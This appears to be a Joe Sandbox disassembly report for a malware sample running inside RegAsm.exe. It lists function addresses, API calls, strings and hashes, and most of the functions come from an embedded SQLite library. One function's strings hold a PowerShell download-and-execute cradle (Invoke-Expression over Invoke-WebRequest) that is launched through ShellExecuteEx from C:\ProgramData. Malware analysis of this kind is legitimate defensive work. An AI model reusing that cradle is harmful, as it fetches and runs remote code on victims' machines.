Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
API String ID: 0-1477268580
Opcode ID: c0dc58259c875fa2279ed2cc5e9f57108a7b395bf28ba2acb86498203a742635
Instruction ID: 9887a05504a51f345eb5ed31f535000cbbaae9462431ec1eb3adfd399ea678eb
Opcode Fuzzy Hash: c0dc58259c875fa2279ed2cc5e9f57108a7b395bf28ba2acb86498203a742635
Instruction Fuzzy Hash: 1751E2B56043419FD714CF29DC80A66B7F8FF84B15F08496DE9968B781EBB1E808C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00409840 Relevance: 24.2, APIs: 19, Instructions: 436stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,012BF260,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409A72
HeapAlloc.KERNEL32(00000000), ref: 00409A79
lstrcat.KERNEL32(000000FF,00000000), ref: 00409BBF
lstrcat.KERNEL32(000000FF,00427C8C), ref: 00409BCE
lstrcat.KERNEL32(000000FF,00000000), ref: 00409BE1
lstrcat.KERNEL32(000000FF,00427C90), ref: 00409BF0
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C03
lstrcat.KERNEL32(000000FF,00427C94), ref: 00409C12
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C25
lstrcat.KERNEL32(000000FF,00427C98), ref: 00409C34
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C47
lstrcat.KERNEL32(000000FF,00427C9C), ref: 00409C56
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C69
lstrcat.KERNEL32(000000FF,00427CA0), ref: 00409C78
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C8B
lstrcat.KERNEL32(000000FF,00427CA4), ref: 00409C9A
lstrlen.KERNEL32(000000FF), ref: 00409D10
lstrlen.KERNEL32(000000FF), ref: 00409D1F
memset.MSVCRT ref: 00409D78

Part of subcall function 004100F0: StrCmpCA.SHLWAPI(?,00000000,?,00407516,012BF8F0,?,00000000,?), ref: 004100FA

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$Heap$AllocProcessSystemTimememset
String ID:
API String ID: 248793818-0
Opcode ID: 60424cdee91f9c7364228ba8d33b6472c6ecfcb8414703a912abd327d43f9af3
Instruction ID: e4c0f5946711812f302e6db09ae3c8add09daf9cf66fbe5071595f1d653c5d4b
Opcode Fuzzy Hash: 60424cdee91f9c7364228ba8d33b6472c6ecfcb8414703a912abd327d43f9af3
Instruction Fuzzy Hash: 8D028271800149EBCB14EBE5DC55BEEBB79AF19304F10816EF906B3182DE786A48CB75

Uniqueness

Uniqueness Score: -1.00%

Function 19B8F370 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 196COMMON

Download Yara Rule

Strings

k PRIMARY KEY, v, xrefs: 19B8F544
id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER, xrefs: 19B8F51C
, c%d, xrefs: 19B8F469
config, xrefs: 19B8F549
docsize, xrefs: 19B8F52D
id INTEGER PRIMARY KEY, sz BLOB, xrefs: 19B8F524, 19B8F52C
id INTEGER PRIMARY KEY, xrefs: 19B8F43E
content, xrefs: 19B8F49D
version, xrefs: 19B8F560

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
API String ID: 0-3918257174
Opcode ID: d281e584d925a423375d81b59cec8c3e5c9ae4901e257c5a0c0fa4acda0eaa06
Instruction ID: 3714aa3775fdb75cc1ad5e0a1ad5d47fd517bf0eb0a2a46c8886f489224f70c5
Opcode Fuzzy Hash: d281e584d925a423375d81b59cec8c3e5c9ae4901e257c5a0c0fa4acda0eaa06
Instruction Fuzzy Hash: F85148719002259BC7009F24DC40B9B7BA8EF48B64F4D4569FD899B281E735F91ACBE2

Uniqueness

Uniqueness Score: -1.00%

Function 19A73420 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 392COMMON

Download Yara Rule

Strings

misuse, xrefs: 19A73552, 19A7359E
API called with finalized prepared statement, xrefs: 19A7352C, 19A73588
ATTACH x AS %Q, xrefs: 19A7346F
%s at line %d of [%.10s], xrefs: 19A73557, 19A735A3
API called with NULL prepared statement, xrefs: 19A73517
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19A73548, 19A73594

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-2988319395
Opcode ID: 19e1f6647e94d721558a7bc4f4e8552998b22e49f90dfe183e567b872e8180ce
Instruction ID: 7466d26ea8041350a30174150b80b54d171625575040103fd72fdc1c29e56e88
Opcode Fuzzy Hash: 19e1f6647e94d721558a7bc4f4e8552998b22e49f90dfe183e567b872e8180ce
Instruction Fuzzy Hash: C0D1E5B0900355AFD708CF24EC87B5B77E9BF40B05F094568E98987281EB32E54DCB52

Uniqueness

Uniqueness Score: -1.00%

Function 19B44B10 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 156COMMON

Download Yara Rule

Strings

SELECT * FROM %Q.%Q, xrefs: 19B44B25
misuse, xrefs: 19B44C34
API called with finalized prepared statement, xrefs: 19B44C1E
%s at line %d of [%.10s], xrefs: 19B44C39
rtree constraint failed: %s.(%s<=%s), xrefs: 19B44BF9
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B44C2A
UNIQUE constraint failed: %s.%s, xrefs: 19B44BC9

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
API String ID: 0-2013246442
Opcode ID: ad66ef1794cece0aa7f83b0dabc0d0ef5b07f0f6cb74bf650dbee288b979c0ac
Instruction ID: f54c5f36a212a74e1c18db1712d7ecc4d2d9f8c520ca15ca79b9c5d597826632
Opcode Fuzzy Hash: ad66ef1794cece0aa7f83b0dabc0d0ef5b07f0f6cb74bf650dbee288b979c0ac
Instruction Fuzzy Hash: 3C414A71900264BFE7009F65DC84FAB37D9EF40F14F1C4528FD8A97181E725A825E6B6

Uniqueness

Uniqueness Score: -1.00%

Function 19BF7C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

winFullPathname2, xrefs: 19BF7D35
winFullPathname1, xrefs: 19BF7CC9
%s%c%s, xrefs: 19BF7C7A

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%c%s$winFullPathname1$winFullPathname2
API String ID: 0-2846052723
Opcode ID: 9f554a503da837b0a6ab6c8172d8c1b6bd1415d457629bbe783c44e5c65a8bac
Instruction ID: dde327f032de079894be6469edecf437caaec1cc6263b4d508043662db69836f
Opcode Fuzzy Hash: 9f554a503da837b0a6ab6c8172d8c1b6bd1415d457629bbe783c44e5c65a8bac
Instruction Fuzzy Hash: 33419D75A043953BE3145A78FCC1F673B99DF45A20F0C44EDF9CAD61D1E622A44EC262

Uniqueness

Uniqueness Score: -1.00%

Function 19B15470 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

JSON cannot hold BLOB values, xrefs: 19B15697
%lld, xrefs: 19B1550D
%!0.15g, xrefs: 19B154D2

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$%lld$JSON cannot hold BLOB values
API String ID: 0-1047910854
Opcode ID: b0531a92c461f4cbfe36fe9747bc3cac2868f1f0f53dacb90a61d7e58f1eaf48
Instruction ID: b2d77a8dff0520d8481f42f0e87c9cfe9fa1d41064ef5024bb2566527fd4b3db
Opcode Fuzzy Hash: b0531a92c461f4cbfe36fe9747bc3cac2868f1f0f53dacb90a61d7e58f1eaf48
Instruction Fuzzy Hash: B451D1775002006BE3105A18FC41FBA3BA6EF82734F1C426DF9558E2D1EBA7B55542A1

Uniqueness

Uniqueness Score: -1.00%

Function 19A92B70 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

("%s", xrefs: 19A92C4A
,arg HIDDEN, xrefs: 19A92C7A
ABLE x, xrefs: 19A92BB6
,schema HIDDEN, xrefs: 19A92CD2
%c"%s", xrefs: 19A92C1B

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x
API String ID: 0-1763475469
Opcode ID: 52e20c65abdc287867687fde0f4a8453fc3f5b2bde06707968dc033cbb33dc85
Instruction ID: b39d957488c6f8078943e24ee2fddcab35044ecf7ad50dcb30d96fbe8ed320e5
Opcode Fuzzy Hash: 52e20c65abdc287867687fde0f4a8453fc3f5b2bde06707968dc033cbb33dc85
Instruction Fuzzy Hash: 8871A0758183829FD714CF24C940B5ABBE4FF98B04F088A5EEC8997251E735E649CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00417458 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 127stringfileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
wsprintfA.USER32 ref: 004174A0

Part of subcall function 00413A80: memset.MSVCRT ref: 00413AB3
Part of subcall function 00413A80: memset.MSVCRT ref: 00413AC5
Part of subcall function 00413A80: lstrcat.KERNEL32(?,00000000), ref: 00413AF1
Part of subcall function 00413A80: lstrcat.KERNEL32(?,012C3260), ref: 00413B10
Part of subcall function 00413A80: lstrcat.KERNEL32(?,?), ref: 00413B24
Part of subcall function 00413A80: lstrcat.KERNEL32(?,012C3110), ref: 00413B38

FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
FindClose.KERNEL32(00000000), ref: 00417507
lstrcat.KERNEL32(?,012BF680), ref: 0041752B
lstrcat.KERNEL32(?,012C2AA0), ref: 0041753F
lstrlen.KERNEL32(000000FF), ref: 00417549
lstrlen.KERNEL32(000000FF), ref: 00417557

Strings

%s\%s, xrefs: 0041749A
pwA, xrefs: 00417579, 004174C2, 004174CA, 00417581

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Findlstrlenmemset$CloseFileNextwsprintf
String ID: %s\%s$pwA
API String ID: 3642149608-466749030
Opcode ID: 875d51b01d3a38dba38f2ac80e5ce4861643c7340cf1d41c11cdd83305f67ae8
Instruction ID: 2e90e08b6375851233fbc302e69b98981367c3422ce142ffed233beea235272d
Opcode Fuzzy Hash: 875d51b01d3a38dba38f2ac80e5ce4861643c7340cf1d41c11cdd83305f67ae8
Instruction Fuzzy Hash: 7941BFB5900209ABCB14EFA0CC45FEE7779BF49704F40459EF605A3191DB78AB88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417456 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 126stringfileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
wsprintfA.USER32 ref: 004174A0

Part of subcall function 00413A80: memset.MSVCRT ref: 00413AB3
Part of subcall function 00413A80: memset.MSVCRT ref: 00413AC5
Part of subcall function 00413A80: lstrcat.KERNEL32(?,00000000), ref: 00413AF1
Part of subcall function 00413A80: lstrcat.KERNEL32(?,012C3260), ref: 00413B10
Part of subcall function 00413A80: lstrcat.KERNEL32(?,?), ref: 00413B24
Part of subcall function 00413A80: lstrcat.KERNEL32(?,012C3110), ref: 00413B38

FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
FindClose.KERNEL32(00000000), ref: 00417507
lstrcat.KERNEL32(?,012BF680), ref: 0041752B
lstrcat.KERNEL32(?,012C2AA0), ref: 0041753F
lstrlen.KERNEL32(000000FF), ref: 00417549
lstrlen.KERNEL32(000000FF), ref: 00417557

Strings

%s\%s, xrefs: 0041749A
pwA, xrefs: 00417579, 004174C2, 004174CA, 00417581

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Findlstrlenmemset$CloseFileNextwsprintf
String ID: %s\%s$pwA
API String ID: 3642149608-466749030
Opcode ID: ad0fc3c1fb2e1b9641804281d39e155f99d710fd063f0faf182d5bb4228e525a
Instruction ID: 924de8276c418feef4113d708d31dfcabf1e1a37831f06c86973242481a33fa5
Opcode Fuzzy Hash: ad0fc3c1fb2e1b9641804281d39e155f99d710fd063f0faf182d5bb4228e525a
Instruction Fuzzy Hash: 2941BEB5900209ABCB10EBA0CC45FEE7779AF49704F40459EF605A3191DB78AB88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004134B0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 330COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,012BF260,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

ShellExecuteEx.SHELL32(0000003C), ref: 0041388D

Strings

*.ps1, xrefs: 0041350B
C:\ProgramData\, xrefs: 0041352A
"" , xrefs: 00413716
Invoke-Expression (Invoke-WebRequest -Uri ", xrefs: 004135BF
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00413627
.ps1, xrefs: 00413596
<, xrefs: 00413845
C:\ProgramData\, xrefs: 00413655
" -UseBasicParsing).Content, xrefs: 004135E3

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-186952963
Opcode ID: 46e10d4c4e7e76fb46ca7988961a51191b454e96b3af44bc7cf6f3febe5ff9b1
Instruction ID: fa8f6e43a0c6782230aca54303917860090d0f7f5421da2d4c287f35756e6bbf
Opcode Fuzzy Hash: 46e10d4c4e7e76fb46ca7988961a51191b454e96b3af44bc7cf6f3febe5ff9b1
Instruction Fuzzy Hash: B2D15E71811249EACB15EBA5D952BDDBBB86F29304F1040AEF50573282DE781B4CCBB9

Uniqueness

Uniqueness Score: -1.00%

Function 19A93D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

%Q., xrefs: 19A93E11
PRAGMA , xrefs: 19A93DC5
=%Q, xrefs: 19A93E7F

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %Q.$=%Q$PRAGMA
API String ID: 0-2099833060
Opcode ID: d5c4ae6d7dc6f0583c81a162fa52789c51805724e722241ebbb26c34785550ea
Instruction ID: 732bd6854bd1a008812b5befa1de5441b715d618f04bd5092ecee1ceac0a75a2
Opcode Fuzzy Hash: d5c4ae6d7dc6f0583c81a162fa52789c51805724e722241ebbb26c34785550ea
